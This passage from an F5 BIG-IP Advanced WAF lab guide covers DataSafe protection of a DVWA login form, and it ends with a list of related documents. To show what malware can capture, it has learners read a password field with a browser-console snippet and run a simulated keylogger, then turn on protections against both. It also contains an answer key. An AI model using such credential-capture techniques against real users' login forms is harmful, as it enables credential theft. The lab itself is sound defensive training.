− Navigate to Local Traffic and right-click on Virtual Servers, then select Open in a new tab, then in the new tab
click dvwa_virtual, and then open the Security > Policies page.
− From the DataSafe Profile list select Enabled, then for Profile select dvwa_datasafe_profile,
then click Update, and then close the second tab.
− In the DVWA page click Logout, and then enter the credentials victim / P@ssw0rd! but do not click Login.
− Open the Console tab and repeat the following and press Enter (type the ↑ key on your keyboard):
document.forms[0].password.value;

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 114
ASM Lesson 15 – DataSafe
Question:
Is the password value now safe from malware prior to submitting the form? _______________

− Click Login, then in the inspection window select the Network tab and click login.php, and then view the bottom of
the Headers tab.

Questions:
Is the password value now safe from malware after submitting the form? _______________

Is the username value now safe from malware after submitting the form? _______________

− In the Configuration Utility, for the password parameter select the Substitute Value checkbox, and then click Save.
− In the DVWA page click Logout, and then enter the credentials victim / P@ssw0rd! but do not click Login.
− Open the Console tab and repeat the following and press Enter (type the ↑ key on your keyboard):
document.forms[0].password.value;

Question:
Is the password value now safe from malware prior to submitting the form? _______________

Task 3 – Use Keylogger Protection

Configure the BIG-IP DataSafe profile to protect passwords that are captured from keylogger programs.

− Click the DVWA bookmark, and then click the Hacking tools bookmark.
− From the hacking tools click Start Keylogger, then for the Password type P@ssw0rd!
− Right-click at the top of the hacking tools widget and select Inspect.

− In the inspection tools examine the Elements tab.

This data has been captured by the keylogger program and can now be viewed by a malicious user.
− In the Configuration Utility, from the left menu open the Application Layer Encryption page and select
the Keylogger Protection checkbox, and then click Save.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 115
ASM Lesson 15 – DataSafe
− In the DVWA page click the DVWA bookmark, and then click the Hacking tools bookmark.
− From the hacking tools click Start Keylogger, then for the Password type P@ssw0rd!
− Right-click at the top of the hacking tools widget and select Inspect.
− In the inspection tools expand the div id="vToolsconsole" tag.

Question:
Is the password visible within the keylog file? _______________

− Click back into the Password field and examine the Elements tab.
While the cursor is inside the password field, random characters continue to get added to the keylog file.

Task 4 – Use Real-Time Encryption

Configure the BIG-IP DataSafe profile so that passwords are encrypted in real-time as they are typed.

− Click the DVWA bookmark, then right-click inside the Password field and select Inspect.
− While you examine the Elements tab, for the Password type P@ssw0rd!
Encryption is not taking place in real-time, making it vulnerable to malware that grabs passwords as
they are typed.
− In the Configuration Utility select the Advanced > Real-Time Encryption checkbox, and then click Save.
− In the DVWA page click the DVWA bookmark.
− While you examine the Elements tab, for the Password type P@ssw0rd!

The encryption for the password field is now taking place in real-time, as you type.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 116
ASM Lesson 15 – DataSafe

Task 5 – Enable HTML Field Obfuscation and Decoy Inputs

Configure the BIG-IP DataSafe profile to enable HTML field obfuscation and decoy input fields for the login page.

− Click the DVWA bookmark, then right-click inside the Username field and select Inspect, and then examine
the name value for this input parameter.

You can view the name for this parameter: username. You can also view the name of the password parameter.
This makes it easy for the fraudsters to craft targeted web applications for malware.
− Right-click the <form action="login.php" method="post"> line and select Edit as HTML.
− Notice that there are three input values within the form tags.

The code within the form is static HTML. There are three parameters, the username and password fields and
the submit button. This static HTML code makes it very easy for fraudsters to develop malware that targets this
web page.
− In the Configuration Utility select the HTML Field Obfuscation checkbox, and then select
the Add Decoy Inputs checkbox.
− Open the Parameters page, then for both the username and password parameters select the Obfuscate checkbox,
and then click Save.
− In the DVWA page click the DVWA bookmark, then right-click inside the Username field and select Inspect, and
then examine the name value for this input parameter.

The name of the username parameter is now obfuscated. In addition, the obfuscated value changes
every few seconds.
− Right-click the <form action="login.php" method="post"> line and select Edit as HTML.
BIG-IP DataSafe adds decoy input fields in the HTML source code.
− Click outside of the form edit panel and examine the contents of the form element.
BIG-IP DataSafe adds and removes decoy input fields in the HTML source code dynamically, making it virtually
impossible for a fraudster to manipulate the form and/or steal data from it.
− Log in as victim / P@ssw0rd!
The successful login shows that the HTML obfuscation works transparently and does not affect the
user experience
− In the inspection window on the Network tab click login.php, and then view the bottom of the Headers tab.
There are now several parameter names and values, and the fraudster will have no way of targeting
this web page.
− Close the DVWA page.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 117
ASM Lesson 15 – DataSafe

PREPARE FOR NEXT EXERCISE

− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete security anti-fraud profile dvwa_datasafe_profile
exit

Question and Answer Key

Task 2 – Enable DataSafe Protection
Q: Is the password value now safe from malware prior to submitting the form?
A: No

Q: Is the password value now safe from malware after submitting the form?
A: Yes

Q: Is the username value now safe from malware after submitting the form?
A: Yes

Q: Is the password value now safe from malware prior to submitting the form?
A: Yes

Task 3 – Use Keylogger Protection

Q: Is the password easily visible within the keylog file?
A: No

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 118

F5 - Configuring BIG-IP LTM v11 - Instructor
100% (1)
F5 - Configuring BIG-IP LTM v11 - Instructor
493 pages
f5 Big-Ip Asm Training
100% (1)
f5 Big-Ip Asm Training
272 pages
Oct Training F5 101 V5a - Certification Prep - Tmos v13.1
100% (1)
Oct Training F5 101 V5a - Certification Prep - Tmos v13.1
86 pages
Workshop: R80.10 Edition
No ratings yet
Workshop: R80.10 Edition
518 pages
F5 LTM Specialist 301a Dumps Questions V8.02 DumpsBase PDF
0% (1)
F5 LTM Specialist 301a Dumps Questions V8.02 DumpsBase PDF
21 pages
Pcnsa Study Guide
No ratings yet
Pcnsa Study Guide
121 pages
Building F5 BIG-IP Lab For Free
100% (2)
Building F5 BIG-IP Lab For Free
22 pages
F5 BIGIP ASM Presentation
100% (1)
F5 BIGIP ASM Presentation
182 pages
ISE Lab Guide Part 01
No ratings yet
ISE Lab Guide Part 01
71 pages
F5 Troubleshoot Docuemtn
100% (1)
F5 Troubleshoot Docuemtn
113 pages
f5 Automation Labs
100% (2)
f5 Automation Labs
251 pages
f5 Bip Ip DNS 302 Specialist Exam 1685189109
100% (1)
f5 Bip Ip DNS 302 Specialist Exam 1685189109
52 pages
BIG-IP DNS Implementations
No ratings yet
BIG-IP DNS Implementations
122 pages
Certification Study Guide 401
No ratings yet
Certification Study Guide 401
94 pages
F5 ASM v10 Student Guide PDF
No ratings yet
F5 ASM v10 Student Guide PDF
334 pages
F5 BIG IP LTM 301A 301B Key Notes Feb 2023 1677506622
No ratings yet
F5 BIG IP LTM 301A 301B Key Notes Feb 2023 1677506622
63 pages
R80 Student Manual + OCR
100% (1)
R80 Student Manual + OCR
256 pages
ASM Lab Day: ASM - Advanced Mitigation Techniques
100% (1)
ASM Lab Day: ASM - Advanced Mitigation Techniques
59 pages
F5 301b Certification Prep
100% (1)
F5 301b Certification Prep
42 pages
F5 Networks 301a - LTM Specialist: Architect, Set-Up & Deploy Study Guide Version 1 - TMOS 11.2
No ratings yet
F5 Networks 301a - LTM Specialist: Architect, Set-Up & Deploy Study Guide Version 1 - TMOS 11.2
230 pages
F5 LTM and GTM Basic Concepts and Operations
No ratings yet
F5 LTM and GTM Basic Concepts and Operations
100 pages
PBC - LTM - v13.0 - E
No ratings yet
PBC - LTM - v13.0 - E
115 pages
F5 101 V12.35
100% (2)
F5 101 V12.35
93 pages
f5 Asm Operations Guide
100% (1)
f5 Asm Operations Guide
181 pages
BIG-IP Application Security Manager Implementations
No ratings yet
BIG-IP Application Security Manager Implementations
396 pages
LTM Fundamentals Exercise Guide - Partners - V13.0.K
No ratings yet
LTM Fundamentals Exercise Guide - Partners - V13.0.K
193 pages
F5 101 Test Notes
No ratings yet
F5 101 Test Notes
103 pages
f5 Asm Operations Guide
No ratings yet
f5 Asm Operations Guide
100 pages
F5 LTM Lab Manual-1 PDF
No ratings yet
F5 LTM Lab Manual-1 PDF
82 pages
F5 Irules Basics For N
No ratings yet
F5 Irules Basics For N
10 pages
3 F5 BIG-IP Basics
No ratings yet
3 F5 BIG-IP Basics
17 pages
Adding Firewalls To Panorama: EDU-220 Panorama 8.1 Courseware Version B
No ratings yet
Adding Firewalls To Panorama: EDU-220 Panorama 8.1 Courseware Version B
30 pages
F5 BIG-IP APM - Implementation Guide
No ratings yet
F5 BIG-IP APM - Implementation Guide
8 pages
Passo 3 - F5 Virtual Environment Hands-On Exercise Guide - ASM (LatAm)
No ratings yet
Passo 3 - F5 Virtual Environment Hands-On Exercise Guide - ASM (LatAm)
25 pages
F5 ASM Course Content
No ratings yet
F5 ASM Course Content
20 pages
Guide To IRules
100% (2)
Guide To IRules
52 pages
f5 301a Study Guide LTM Specialist r2pdf
No ratings yet
f5 301a Study Guide LTM Specialist r2pdf
195 pages
f5 LTM GTM Operations Guide 1 0 PDF
No ratings yet
f5 LTM GTM Operations Guide 1 0 PDF
144 pages
VLab Demo - Using ASM For Web Vulnerabilities - V12.0.0.01
No ratings yet
VLab Demo - Using ASM For Web Vulnerabilities - V12.0.0.01
21 pages
F5 ASM Interview Questions and Answer 1693390853
No ratings yet
F5 ASM Interview Questions and Answer 1693390853
3 pages
GTM Advanced Topics - v5
No ratings yet
GTM Advanced Topics - v5
11 pages
F5 LTM Lab Guide
No ratings yet
F5 LTM Lab Guide
7 pages
F5 DNS Guide PDF
No ratings yet
F5 DNS Guide PDF
102 pages
Document F5
No ratings yet
Document F5
10 pages
SSL Intercept F5
No ratings yet
SSL Intercept F5
58 pages
BIG-IP System IRules Concepts
100% (2)
BIG-IP System IRules Concepts
44 pages
SQL Exercise
No ratings yet
SQL Exercise
14 pages
F5 Configuring BIG-IP ASM - Application Security Manager Training v13
No ratings yet
F5 Configuring BIG-IP ASM - Application Security Manager Training v13
6 pages
Configuring BIG IP ASM ApplicationSecurityManager1
No ratings yet
Configuring BIG IP ASM ApplicationSecurityManager1
7 pages
TRENDsCampus - ADVANCED - User Protection - Lab Guide v5.1
No ratings yet
TRENDsCampus - ADVANCED - User Protection - Lab Guide v5.1
99 pages
100 F5 Interview Questions
No ratings yet
100 F5 Interview Questions
9 pages
Cat 1 CSC 311
100% (1)
Cat 1 CSC 311
5 pages
Tcpdump f5 Command
No ratings yet
Tcpdump f5 Command
2 pages
303 Big-Ip Asm Specialist: Exam Blueprint
No ratings yet
303 Big-Ip Asm Specialist: Exam Blueprint
6 pages
F5 Ddos Protection: Recommended Practices (Volume 1) : White Paper
No ratings yet
F5 Ddos Protection: Recommended Practices (Volume 1) : White Paper
41 pages
F5 DNS Guide Example
No ratings yet
F5 DNS Guide Example
15 pages
TRENDsCampus Detection and Response Lab Guide-V3
No ratings yet
TRENDsCampus Detection and Response Lab Guide-V3
31 pages
Advanced Security TTT Workbook - V - 12.1.F
No ratings yet
Advanced Security TTT Workbook - V - 12.1.F
80 pages
F5 ASM Training
No ratings yet
F5 ASM Training
3 pages
Google Cloud Platform: Quick Overview: Build, Test and Deploy Applications On Google's Infrastructure
No ratings yet
Google Cloud Platform: Quick Overview: Build, Test and Deploy Applications On Google's Infrastructure
22 pages
ASM1 - New File
No ratings yet
ASM1 - New File
8 pages
PBC - ASM - AWAF Full Course - Instructor Notes For Hands-On Exercises - 2020-07-13
No ratings yet
PBC - ASM - AWAF Full Course - Instructor Notes For Hands-On Exercises - 2020-07-13
6 pages
It Glossary English
No ratings yet
It Glossary English
9 pages
SA Unit 3
No ratings yet
SA Unit 3
14 pages
Laravel Interview Questions
No ratings yet
Laravel Interview Questions
12 pages
OPNsense Brochure 2018
No ratings yet
OPNsense Brochure 2018
16 pages
CGM Kerala DO-OnlineAttendance-Reg
No ratings yet
CGM Kerala DO-OnlineAttendance-Reg
1 page
Autogpt
No ratings yet
Autogpt
4 pages
Cyber Crime: "The Invisible Criminal Is Dangerous Than The Visible One"
No ratings yet
Cyber Crime: "The Invisible Criminal Is Dangerous Than The Visible One"
30 pages
Data Protection For VMware Installation
No ratings yet
Data Protection For VMware Installation
142 pages
Oracle Backup & Recovery MCQs
No ratings yet
Oracle Backup & Recovery MCQs
20 pages
Cti Slide
No ratings yet
Cti Slide
5 pages
BU CIS Brochure
No ratings yet
BU CIS Brochure
2 pages
Tiffenbox
No ratings yet
Tiffenbox
8 pages
MOP For HNBGW Config On Redundant Serving Node
No ratings yet
MOP For HNBGW Config On Redundant Serving Node
8 pages
Answer Any Ten Questions
No ratings yet
Answer Any Ten Questions
2 pages
How To Disable Optimizer Statistics Advisor From 12.2 Onwards (Doc ID 2686022.1)
No ratings yet
How To Disable Optimizer Statistics Advisor From 12.2 Onwards (Doc ID 2686022.1)
2 pages
An Effective Garage Management System Web Application For Customer Service
No ratings yet
An Effective Garage Management System Web Application For Customer Service
6 pages
QwikTest Pro MVP
No ratings yet
QwikTest Pro MVP
35 pages
Java Unit 2 - 23410735 - 2023 - 11 - 22 - 12 - 41
No ratings yet
Java Unit 2 - 23410735 - 2023 - 11 - 22 - 12 - 41
25 pages
XMLA
No ratings yet
XMLA
4 pages
CLOCK APP-waterfall Model
No ratings yet
CLOCK APP-waterfall Model
5 pages
10 Events
No ratings yet
10 Events
13 pages
Cloud Computing Assignment Answers
No ratings yet
Cloud Computing Assignment Answers
4 pages
Chatbot Documentation
No ratings yet
Chatbot Documentation
3 pages
Greytip Online
No ratings yet
Greytip Online
15 pages
Aspect Requirement Engineering
No ratings yet
Aspect Requirement Engineering
3 pages
Competitive Constructs of ERP Implementation in Public Sector in Pakistan
No ratings yet
Competitive Constructs of ERP Implementation in Public Sector in Pakistan
11 pages
Standard Request Form - 0001
No ratings yet
Standard Request Form - 0001
1 page
CompTIA Security+ SY0-601 Exam Practice Tests
From Everand
CompTIA Security+ SY0-601 Exam Practice Tests
CertSquad Professional Trainers
No ratings yet